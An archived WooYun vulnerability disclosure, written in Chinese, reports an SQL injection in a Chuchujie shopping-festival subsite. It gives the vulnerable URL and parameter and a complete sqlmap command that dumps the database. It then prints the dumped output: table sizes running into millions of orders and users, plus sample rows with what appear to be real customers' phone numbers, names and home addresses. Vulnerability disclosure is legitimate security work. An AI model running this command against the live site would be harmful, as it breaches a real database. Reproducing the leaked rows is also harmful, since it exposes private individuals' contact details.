乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-10: 细节已通知厂商并且等待厂商处理中 2015-11-23: 厂商已经主动忽略漏洞,细节向公众公开
双十一,要狂欢,也要安全楚楚街某分站存在SQL注入漏洞(买得漂亮,也要买得安全)涉及上千万订单信息,几百万用户信息
#1 注入地址
http://huodong.chuchujie.com:80/20151111/ajax.php?category1=3&action=fgetGoods注入参数 category1
#漏洞证明
python sqlmap.py -u "http://huodong.chuchujie.com:80/20151111/ajax.php?category1=3&action=fgetGoods" -D huodong -T inviteOrders --dump --start 1 --stop 5
Database: huodong+--------------------------+---------+| Table | Entries |+--------------------------+---------+| inviteOrders | 10922341 || zlUserinfo3 | 7929815 || inviteUser | 7467237 || sso_openid | 4531859 || zlUserinfo4 | 3608880 || digAlert | 3415202 || digUser201508 | 1975330 || digUser | 1953446 || digUser201509 | 1626351 || digUser201504 | 1575203 || digUser201507 | 1465415 || digUserGift | 1418846 || digUser201510 | 1329393 || digUser201506 | 1325872 || zlComment5 | 1066662 || digUser201505 | 967930 || zlComment12 | 680894 || digUserWish | 559441 || rp_getuser | 536124 || springUser | 515823 |
Database: huodongTable: zlUserinfo3[5 entries]+----+--------+----------+-------------+-----------------------------------------+------------+| id | itemid | userId | userTel | awardCode | created_on |+----+--------+----------+-------------+-----------------------------------------+------------+| 1 | 149 | 23838667 | 13413191722 | CC0000001,CC0000014,CC0000015,CC0000016 | 20150827 || 2 | 149 | 11775670 | 13938139707 | CC0000002,CC0000569,CC0000570,CC0000571 | 20150827 || 3 | 149 | 22771867 | 15139134935 | CC0000003,CC0000026,CC0000027,CC0000028 | 20150827 || 4 | 149 | 24953981 | 18316113437 | CC0000004,CC0000367,CC0000368,CC0000369 | 20150827 || 5 | 149 | 6822479 | 13333222660 | CC0000005,CC0000299,CC0000300,CC0000301 | 20150827 |+----+--------+----------+-------------+-----------------------------------------+------------+
Database: huodongTable: inviteOrders[5 entries]+----+-------+---------+------------------------------+-----------+--------+------------+---------+-------------+-------------------------------------+-------------------------------------------------------------------+---------------------+-----------+----------------------------------------------------------------------------------------------------------------------------------------+| id | cid | skuId | openId | areaId | shopId | productId | orderSN | userTel | userName | userArea | createdOn | version | userAddress |+----+-------+---------+------------------------------+-----------+--------+------------+---------+-------------+-------------------------------------+-------------------------------------------------------------------+---------------------+-----------+----------------------------------------------------------------------------------------------------------------------------------------+| 1 | 11281 | 9250445 | oioKYtyPvFefOgsJy5rX0KSF-b8c | 101001005 | 4063 | 1000406353 | <blank> | 13718304689 | \测\试\马\艳\琴 | \北\京\市,\北\京\市,\朝\阳\区 | 2015-05-18 13:13:05 | 16 | \北\京\市\朝\阳\区\霄\云\路28\号\院\网\信\大\厦2\号\楼6\层 || 3 | 11281 | 2514131 | oioKYt17Cj7d8abZTB3-60Q3bhEo | 117010006 | 1219 | 1000121919 | <blank> | 15801421563 | \小\倩\测\试 | \河\南\省,\商\丘\市,\民\权\县 | 2015-05-18 13:48:46 | 21 | \河\南\省\商\丘\市\民\权\县\绿\洲\超\市\附\近 || 4 | 11281 | 6141583 | oioKYtxQzv2Bo7UxugkBPI5FBxtU | 101001010 | 2766 | 1000276611 | <blank> | 18510157865 | \李\亚\品 | \北\京\市,\北\京\市,\房\山\区 | 2015-05-18 14:18:00 | 4 | \良\乡\镇\大\学\城\西\鸿\顺\园\西\区12\号\楼2\单\元501 || 6 | 11281 | 5040174 | oioKYtzFn1zsRswMZbrwcjjt9ka8 | 101001008 | 4857 | 100048571 | <blank> | 18611544505 | \项\秋\媛 | \北\京\市,\北\京\市,\海\淀\区 | 2015-05-18 14:51:38 | 24 | \丰\慧\中\路7\号\新\材\料\大\厦11\层 || 7 | 11281 | 5131414 | oioKYt4IJwMn6JFZ-UmFMdA5GKOU | 101001008 | 2250 | 1000225046 | <blank> | 18911471706 | \朱\加\保 | \北\京\市,\北\京\市,\海\淀\区 | 2015-05-18 15:08:20 | 3 | \北\京\市\海\淀\区\中\关\村\东\路123\号\都\市\网\景3\号\口2003 |+----+-------+---------+------------------------------+-----------+--------+------------+---------+-------------+-------------------------------------+-------------------------------------------------------------------+---------------------+-----------+----------------------------------------------------------------------------------------------------------------------------------------+
过滤
危害等级:无影响厂商忽略
忽略时间:2015-11-23 09:30
漏洞Rank:15 (WooYun评价)
暂无